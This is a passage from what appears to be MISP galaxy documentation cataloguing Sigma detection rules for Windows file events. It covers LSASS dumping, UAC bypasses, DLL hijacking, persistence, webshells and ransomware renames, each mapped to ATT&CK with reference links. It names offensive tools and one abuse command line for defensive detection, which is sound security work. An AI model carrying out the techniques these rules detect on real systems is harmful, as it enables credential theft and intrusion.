https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml

LiveKD Driver Creation

Detects the creation of the LiveKD driver, which is used for live kernel debugging

The tag is: misp-galaxy:sigma-rules="LiveKD Driver Creation"

Table 9981. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver.yml

UAC Bypass Abusing Winsat Path Parsing - File

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Abusing Winsat Path Parsing - File"

UAC Bypass Abusing Winsat Path Parsing - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9982. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml

Publisher Attachment File Dropped In Suspicious Location

Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents

The tag is: misp-galaxy:sigma-rules="Publisher Attachment File Dropped In Suspicious Location"

Table 9983. Table References

Links

https://twitter.com/EmericNasi/status/1623224526220804098

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml

UAC Bypass Using IEInstal - File

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using IEInstal - File"

UAC Bypass Using IEInstal - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9984. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml

Assembly DLL Creation Via AspNetCompiler

Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

The tag is: misp-galaxy:sigma-rules="Assembly DLL Creation Via AspNetCompiler"

Table 9985. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_aspnet_temp_files.yml

PsExec Service File Creation

Detects the default PsExec service filename, which indicates PsExec service installation and execution

The tag is: misp-galaxy:sigma-rules="PsExec Service File Creation"

PsExec Service File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9986. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml

Potential Initial Access via DLL Search Order Hijacking

Detects attempts to create a DLL file in a known desktop application dependencies folder, such as Slack, Teams or OneDrive, by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.

The tag is: misp-galaxy:sigma-rules="Potential Initial Access via DLL Search Order Hijacking"

Potential Initial Access via DLL Search Order Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 9987. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc

https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml

Suspicious Creation with Colorcpl

Detects colorcpl.exe creating a file in c:\windows\system32\spool\drivers\color\. Once executed with a file as argument, colorcpl.exe copies that arbitrary file into this directory.

The tag is: misp-galaxy:sigma-rules="Suspicious Creation with Colorcpl"

Suspicious Creation with Colorcpl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 9988. Table References

Links

https://twitter.com/eral4m/status/1480468728324231172?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml

File With Uncommon Extension Created By An Office Application

Detects the creation of files with an executable or script extension by an Office application.

The tag is: misp-galaxy:sigma-rules="File With Uncommon Extension Created By An Office Application"

File With Uncommon Extension Created By An Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9989. Table References

Links

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi(aka_REvil)_Ransomware.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml

Hijack Legit RDP Session to Move Laterally

Detects the usage of tsclient share to place a backdoor on the RDP source machine’s startup folder

The tag is: misp-galaxy:sigma-rules="Hijack Legit RDP Session to Move Laterally"

Hijack Legit RDP Session to Move Laterally has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9990. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml

Suspicious File Creation Activity From Fake Recycle.Bin Folder

Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware

The tag is: misp-galaxy:sigma-rules="Suspicious File Creation Activity From Fake Recycle.Bin Folder"

Table 9991. Table References

Links

https://www.mandiant.com/resources/blog/infected-usb-steal-secrets

https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml

LSASS Process Memory Dump Creation Via Taskmgr.EXE

Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

The tag is: misp-galaxy:sigma-rules="LSASS Process Memory Dump Creation Via Taskmgr.EXE"

LSASS Process Memory Dump Creation Via Taskmgr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9992. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml

NTDS.DIT Created

Detects creation of a file named "ntds.dit" (Active Directory Database)

The tag is: misp-galaxy:sigma-rules="NTDS.DIT Created"

NTDS.DIT Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9993. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml

Potential Persistence Via Notepad++ Plugins

Detects the creation of new ".dll" files inside the plugins directory of a Notepad++ installation by a process other than "gup.exe", which could indicate persistence.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Notepad++ Plugins"

Table 9994. Table References

Links

https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml

SafetyKatz Default Dump Filename

Detects default lsass dump filename from SafetyKatz

The tag is: misp-galaxy:sigma-rules="SafetyKatz Default Dump Filename"

SafetyKatz Default Dump Filename has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9995. Table References

Links

https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63

https://github.com/GhostPack/SafetyKatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml

Windows Binaries Write Suspicious Extensions

Detects Windows executables that writes files with suspicious extensions

The tag is: misp-galaxy:sigma-rules="Windows Binaries Write Suspicious Extensions"

Windows Binaries Write Suspicious Extensions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 9996. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml

ISO or Image Mount Indicator in Recent Files

Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.

The tag is: misp-galaxy:sigma-rules="ISO or Image Mount Indicator in Recent Files"

ISO or Image Mount Indicator in Recent Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 9997. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore

https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml

ScreenConnect Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="ScreenConnect Temporary Installation Artefact"

ScreenConnect Temporary Installation Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9998. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml

Legitimate Application Dropped Executable

Detects programs on a Windows system that should not write executables to disk

The tag is: misp-galaxy:sigma-rules="Legitimate Application Dropped Executable"

Legitimate Application Dropped Executable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9999. Table References

Links

https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml

Suspicious Startup Folder Persistence

Detects when a file with a suspicious extension is created in the startup folder

The tag is: misp-galaxy:sigma-rules="Suspicious Startup Folder Persistence"

Suspicious Startup Folder Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 10000. Table References

Links

https://github.com/last-byte/PersistenceSniper

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml

Potential Persistence Attempt Via ErrorHandler.Cmd

Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory, which could be used as a method of persistence. The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Attempt Via ErrorHandler.Cmd"

Table 10001. Table References

Links

https://github.com/last-byte/PersistenceSniper

https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml

Renamed VsCode Code Tunnel Execution - File Indicator

Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility by an "Image" or "Process" other than VsCode.

The tag is: misp-galaxy:sigma-rules="Renamed VsCode Code Tunnel Execution - File Indicator"

Table 10002. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml

ISO File Created Within Temp Folders

Detects the creation of an ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.

The tag is: misp-galaxy:sigma-rules="ISO File Created Within Temp Folders"

ISO File Created Within Temp Folders has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10003. Table References

Links

https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html

https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image

https://twitter.com/Sam0x90/status/1552011547974696960

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

The tag is: misp-galaxy:sigma-rules="AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File"

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10004. Table References

Links

https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml

SCR File Write Event

Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.

The tag is: misp-galaxy:sigma-rules="SCR File Write Event"

SCR File Write Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10005. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Desk/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_scr_file.yml

Office Macro File Download

Detects the creation of new Office macro files on the system via an application (browser, mail client).

The tag is: misp-galaxy:sigma-rules="Office Macro File Download"

Office Macro File Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10006. Table References

Links

https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml

New Custom Shim Database Created

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

The tag is: misp-galaxy:sigma-rules="New Custom Shim Database Created"

New Custom Shim Database Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 10007. Table References

Links

https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/

https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence

https://liberty-shell.com/sec/2020/02/25/shim-persistence/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml

Potential Webshell Creation On Static Website

Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.

The tag is: misp-galaxy:sigma-rules="Potential Webshell Creation On Static Website"

Potential Webshell Creation On Static Website has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 10008. Table References

Links

PT ESC rule and personal experience

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml

Suspicious Get-Variable.exe Creation

Get-Variable is a valid PowerShell cmdlet. The WindowsApps folder is by default in the PATH where PowerShell is executed, so when the Get-Variable command is issued in PowerShell, the system first looks for a Get-Variable executable in the PATH and executes the malicious binary instead of the PowerShell cmdlet.

The tag is: misp-galaxy:sigma-rules="Suspicious Get-Variable.exe Creation"

Suspicious Get-Variable.exe Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10009. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://www.joesandbox.com/analysis/465533/0/html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml

WerFault LSASS Process Memory Dump

Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory dump, which contains user credentials

The tag is: misp-galaxy:sigma-rules="WerFault LSASS Process Memory Dump"

WerFault LSASS Process Memory Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10010. Table References

Links

https://github.com/helpsystems/nanodump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml

Office Macro File Creation

Detects the creation of new Office macro files on the system

The tag is: misp-galaxy:sigma-rules="Office Macro File Creation"

Office Macro File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10011. Table References

Links

https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml

Suspicious File Event With Teams Objects

Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.

The tag is: misp-galaxy:sigma-rules="Suspicious File Event With Teams Objects"

Suspicious File Event With Teams Objects has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 10012. Table References

Links

https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens

https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml

Writing Local Admin Share

Adversaries may interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.

The tag is: misp-galaxy:sigma-rules="Writing Local Admin Share"

Writing Local Admin Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 10013. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml

QuarksPwDump Dump File

Detects a dump file written by QuarksPwDump password dumper

The tag is: misp-galaxy:sigma-rules="QuarksPwDump Dump File"

QuarksPwDump Dump File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 10014. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_quarkspw_filedump.yml

CrackMapExec File Creation Patterns

Detects suspicious file creation patterns found in logs when CrackMapExec is used

The tag is: misp-galaxy:sigma-rules="CrackMapExec File Creation Patterns"

CrackMapExec File Creation Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10015. Table References

Links

https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml

Powerup Write Hijack DLL

The PowerUp tool's Write-HijackDll function exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on the creation of the malicious .bat file (debug.bat by default).

The tag is: misp-galaxy:sigma-rules="Powerup Write Hijack DLL"

Powerup Write Hijack DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 10016. Table References

Links

https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml

Creation Of Non-Existent System DLL

Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.

The tag is: misp-galaxy:sigma-rules="Creation Of Non-Existent System DLL"

Creation Of Non-Existent System DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10017. Table References

Links

https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/

https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992

https://github.com/Wh04m1001/SysmonEoP

https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/

https://decoded.avast.io/martinchlumecky/png-steganography/

https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml

Wmiprvse Wbemcomn DLL Hijack - File

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

The tag is: misp-galaxy:sigma-rules="Wmiprvse Wbemcomn DLL Hijack - File"

Wmiprvse Wbemcomn DLL Hijack - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10018. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml

PowerShell Module File Created By Non-PowerShell Process

Detects the creation of a new PowerShell module file (".psm1", ".psd1", ".dll", ".ps1", etc.) by a non-PowerShell process.

The tag is: misp-galaxy:sigma-rules="PowerShell Module File Created By Non-PowerShell Process"

Table 10019. Table References

Links

Internal Research

https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml

Windows Terminal Profile Settings Modification By Uncommon Process

Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.

The tag is: misp-galaxy:sigma-rules="Windows Terminal Profile Settings Modification By Uncommon Process"

Windows Terminal Profile Settings Modification By Uncommon Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Login Items - T1547.015" with estimative-language:likelihood-probability="almost-certain"

Table 10020. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile

https://twitter.com/nas_bench/status/1550836225652686848

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml

DLL Search Order Hijackig Via Additional Space in Path

Detects when an attacker creates a folder structure similar to Windows system folders (Windows, Program Files, etc.) but with an additional space in the path, in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack.

The tag is: misp-galaxy:sigma-rules="DLL Search Order Hijackig Via Additional Space in Path"

DLL Search Order Hijackig Via Additional Space in Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10021. Table References

Links

https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows

https://twitter.com/cyb3rops/status/1552932770464292864

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml

Suspicious Scheduled Task Write to System32 Tasks

Detects the creation of tasks from processes executed from suspicious locations

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Write to System32 Tasks"

Suspicious Scheduled Task Write to System32 Tasks has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 10022. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml

Suspicious Appended Extension

Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Appended Extension"

Suspicious Appended Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 10023. Table References

Links

https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/

https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml

Potentially Suspicious Self Extraction Directive File Created

Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stands for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self-extracting packages. Attackers have been seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple INI files, not PE binaries.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Self Extraction Directive File Created"

Potentially Suspicious Self Extraction Directive File Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10024. Table References

Links

https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html

https://en.wikipedia.org/wiki/IExpress

https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml

IIS WebServer Access Logs Deleted

Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="IIS WebServer Access Logs Deleted"

IIS WebServer Access Logs Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10025. Table References

Links

https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml

TeamViewer Log File Deleted

